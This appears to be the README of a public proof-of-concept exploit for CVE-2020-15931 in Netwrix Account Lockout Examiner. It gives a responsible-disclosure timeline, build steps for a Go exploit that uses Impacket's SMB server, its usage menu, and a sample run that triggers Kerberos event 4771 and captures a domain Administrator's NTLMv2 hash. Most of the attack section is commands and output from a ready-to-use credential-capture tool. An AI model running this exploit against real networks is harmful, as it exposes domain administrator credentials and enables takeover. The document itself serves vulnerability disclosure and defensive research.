Netwrix Account Lockout Examiner (ALE) before 5.1 allows an unauthenticated, remote adversary to trigger a connection to an attacker-controlled system and capture the NTLMv1/v2 challenge-response of an account with domain administrator privileges. The domain administrator account would already be configured with the product as required for installation. An adversary can exploit this by generating a single Kerberos Pre-Authentication Failed (Event ID 4771) event on a domain controller.
More details about the vulnerability can be found on the following Blog
The vulnerability was discovered in the wild by Robert Surace (@robsauce) and Daniel Min (@bigb0ss), Optiv Security Consultants while performing a security assessment. Upon identification of CVE-2020-15931, Optiv immediately contacted Netwrix to disclose the identified flaw responsibly.
- June 09, 2020 – Vulnerability discovered by Optiv
- June 15, 2020 – Disclosed by Optiv to vendor
- July 14, 2020 – Vendor acknowledged the issue and agreed to release the fixed version
- July 23, 2020 – Disclosed to CNA (MITRE Corporation)
- July 24, 2020 – Vendor released the fixed version of the Netwrix Account Lockout Examiner 5.1
- July 24, 2020 – CVE-2020-15931 assigned by CNA (MITRE Corporation)
- August 13, 2020 – Disclosed to the public
- October 30, 2020 - Base Score 7.5 High assigned by NVD (National Vulnerability Database)
The exploit script was developed in golang. Install the following dependencies:
go get github.com/fatih/color
go get github.com/ropnop/gokrb5/client
go get github.com/ropnop/gokrb5/config
It also utilizes the smbserver.py from Impacket.
pip install impacket
Finally, download the exploit script and build it.
git clone https://github.com/optiv/CVE-2020-15931
go build cve-2020-15931.go
$ ./cve-2020-15931
_______ ________ ___ ___ ___ ___ __ _____ ___ ____ __
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ | ____/ _ \___ \/_ |
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
| |____ \ / | |____ / /_| |_| / /_| |_| | | |___) | / /___) || |
\_____| \/ |______| |____|\___/____|\___/ |_|____/ /_/|____/ |_|
[robSauce & bigb0ss] v1.0
[+] Netwrix Account Lockout Examiner 4.1 Exploit Script
Required:
-d Domain name
-dc Domain controller
-u Valid username
Optional:
-h Print this help menu
Example:
./cve-2020-15931 -d target.com -dc 10.10.0.2 -u jsmith
(Note: At the time of writing, this attack can only be identified via a blind-based attack. This is because it is difficult to determine if the target organization is using Netwrix Account Lockout Examiner on their network to audit account authentications or not.)
$ ./cve-2020-15931 -d bosslab.com -dc 10.10.0.2 -u b0ss1
_______ ________ ___ ___ ___ ___ __ _____ ___ ____ __
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ | ____/ _ \___ \/_ |
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
| |____ \ / | |____ / /_| |_| / /_| |_| | | |___) | / /___) || |
\_____| \/ |______| |____|\___/____|\___/ |_|____/ /_/|____/ |_|
[robSauce & bigb0ss] v1.0
[+] Netwrix Account Lockout Examiner 4.1 Exploit Script
[+] DC: 10.10.0.2
[+] Domain: bosslab.com
[+] Username: b0ss1
[+] Password: wrongPass
[+] Event ID 4771 (Kerberos Pre-Authentication Failed) Triggered!
[+] If vulnerable, you will get a NTLMv1/2 of the Netwrix service account.
[+] SMB Server Started...
Impacket v0.9.22.dev1+20200607.100119.b5c61678 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.0.2,59264)
[*] AUTHENTICATE_MESSAGE(BOSSLAB\Administrator,BOSSLAB-DC01)
[*] User BOSSLAB-DC01\Administrator authenticated successfully
[*] Administrator::BOSSLAB:17dcc32c6eafc48d:f798e7c906eb1b639722614f1417ded1:0101000000000000be18...REDACTED...0000000
[*] Disconnecting Share(1:IPC$)
[*] Closing down connection (10.10.0.2,59264)
[*] Remaining connections []
Netwrix Account Lockout Examiner 5.1
Event ID 4771
Impacket smbserver.py
Gokrb5 Client
CVE-2020-15931